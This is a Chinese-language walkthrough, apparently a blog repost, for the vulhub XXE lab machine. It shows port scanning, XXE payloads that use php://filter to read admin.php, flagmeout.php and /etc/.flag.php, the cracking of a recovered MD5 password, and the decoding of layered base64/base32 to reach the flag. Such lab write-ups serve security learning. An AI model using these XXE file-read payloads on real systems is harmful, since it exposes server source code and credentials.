当前位置: 首页 > article >正文

vulhub xxe靶机通关教程

首先我们进行端口扫描

扫出来端口之后去尝试得出地址为183

发现robots.txt文件

由此我们就得到了两个目录

我们先进入xxe目录,并开始登录抓包

并进入重放器在xml里面构造语句

<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

把那些码复制下来进行base64解码

解码完成后放下翻发现有用户名和密码,用户名为administhebest,但是密码是被md5加密的

那么我们把密码复制下来去md5解密,得出密码admin@123

然后我们去尝试登录

看到一个flag我们点击查看

进入xee目录进行抓包并读取文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

又得到一段编码复制下来进行base64解码

然后再对括号里的进行base32解码

发现还得进行base64解码把base32解码完成之后的复制进行64解码

得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

我们再次进行base64解码

解码之后得出一段php代码

我们打开小皮面板进入自己网站的根目录,创建一个php文件进行访问

把刚刚解码的php代码复制进去,并加上<?php 的开头

保存然后进行访问

这里报错找不到页面肯能是php版本的问题,我们进入小皮->网站->管理->php版本,更换一个版本

这里我改成5.3.29了

下载成功后再进入php版本进行切换

换了之后看到报错内容里面有flag在花括号里


http://www.kler.cn/a/291788.html

相关文章:

  • Linux shell脚本用于常见图片png、jpg、jpeg、tiff格式批量转webp格式后,并添加文本水印
  • 文心一言对接FreeSWITCH实现大模型呼叫中心
  • 华为云计算HCIE笔记01
  • 【Linux进程】进程间的通信
  • 关于如何做技术文档
  • WPF 关于界面UI菜单权限(或者任意控件的显示权限)的简单管理--只是简单简单简单简单
  • 编译FFmpeg动态库
  • 深入Redis:事务的理解
  • 【机器学习-神经网络】卷积神经网络
  • antv x6 的画布大小设置
  • HBase 源码阅读(一)
  • day01-项目概述、环境搭建
  • 【非零段划分 / 2】
  • MySQL——事务与存储过程(三)存储过程的使用(2) 查看存储过程
  • vs2022 的wpf应用,需要生成的WpfApp1\bin\Debug\WpfApp1.exe添加图
  • 等保测评中的访问控制与用户认证
  • WS2812B驱动
  • CAS
  • 面试总结1
  • 前端模拟面试:如何检查JavaScript对象属性是否存在?
  • 分类预测|基于雪消融优化极端梯度提升的数据分类预测Matlab程序SAO-XGBoost 多特征输入多类别输出
  • 安防监控视频打手机检测算法核心技术打手机检测算法源码、模型简介
  • 阿里云对象存储服务(Aliyun OSS):企业级云存储解决方案
  • 毒枸杞事件启示录:EasyCVR视频AI智能监管方案如何重塑食品卫生安全防线
  • matter消息中的组播和广播
  • 鼠标控制dom元素的大小。采用ResizeObserver——监听元素大小的变化